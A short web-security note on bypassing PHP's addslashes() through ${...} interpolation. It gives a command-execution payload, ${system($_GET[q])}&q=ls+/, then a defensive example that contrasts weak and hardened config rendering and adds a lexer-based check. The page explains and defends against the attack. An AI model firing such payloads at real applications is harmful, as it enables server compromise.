Bypass addslashes()

The function `addslashes()` can be bypassed with PHP's complex variable syntax, `${VARIABLE}`, for example `${phpinfo()}`. A second HTTP parameter can also be used to supply the input:

```
${system($_GET[q])}&q=ls+/
```
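Why the escaping fails, and one way to check for it, shown as an added example that is not part of the original page: the bypass applies when the escaped value lands inside a double-quoted PHP string that is later parsed as code. The config-file scenario and the function names `render_weak`, `render_hardened` and `is_plain_literal` are assumptions made for illustration.

```php
<?php
// Added example, not from the original page. Hypothetical scenario: an app
// saves a user-supplied value by generating PHP source for a config file.

// Weak: addslashes() escapes ' " \ and NUL but leaves $ { } untouched, so in
// a double-quoted literal the value is still parsed for interpolation.
function render_weak(string $value): string
{
    return '<?php $title = "' . addslashes($value) . '";';
}

// Hardened: var_export() emits a single-quoted literal, and PHP performs no
// variable or expression interpolation inside single quotes.
function render_hardened(string $value): string
{
    return '<?php $title = ' . var_export($value, true) . ';';
}

// Check: lex the generated source (nothing is executed) and accept it only
// if the assignment's right-hand side is one constant string literal.
function is_plain_literal(string $source): bool
{
    $kinds = [];
    foreach (token_get_all($source) as $tok) {
        if (is_array($tok) && $tok[0] === T_WHITESPACE) {
            continue;
        }
        // Multi-character tokens are arrays; single characters are strings.
        $kinds[] = is_array($tok) ? $tok[0] : $tok;
    }
    return $kinds === [T_OPEN_TAG, T_VARIABLE, '=', T_CONSTANT_ENCAPSED_STRING, ';'];
}

// Constructed sample inputs; the last is the example payload from the page.
$samples = ['Quarterly report', 'O\'Reilly "books"', '${phpinfo()}'];
foreach ($samples as $value) {
    foreach (['weak' => 'render_weak', 'hardened' => 'render_hardened'] as $name => $render) {
        $src = $render($value);
        printf("%-8s %-4s %s\n", $name, is_plain_literal($src) ? 'ok' : 'FLAG', $src);
    }
}
```

Only the weak rendering of the `${phpinfo()}` input is flagged, because the lexer treats it as an interpolated string instead of a constant. The same check can gate any code path that writes request data into generated PHP.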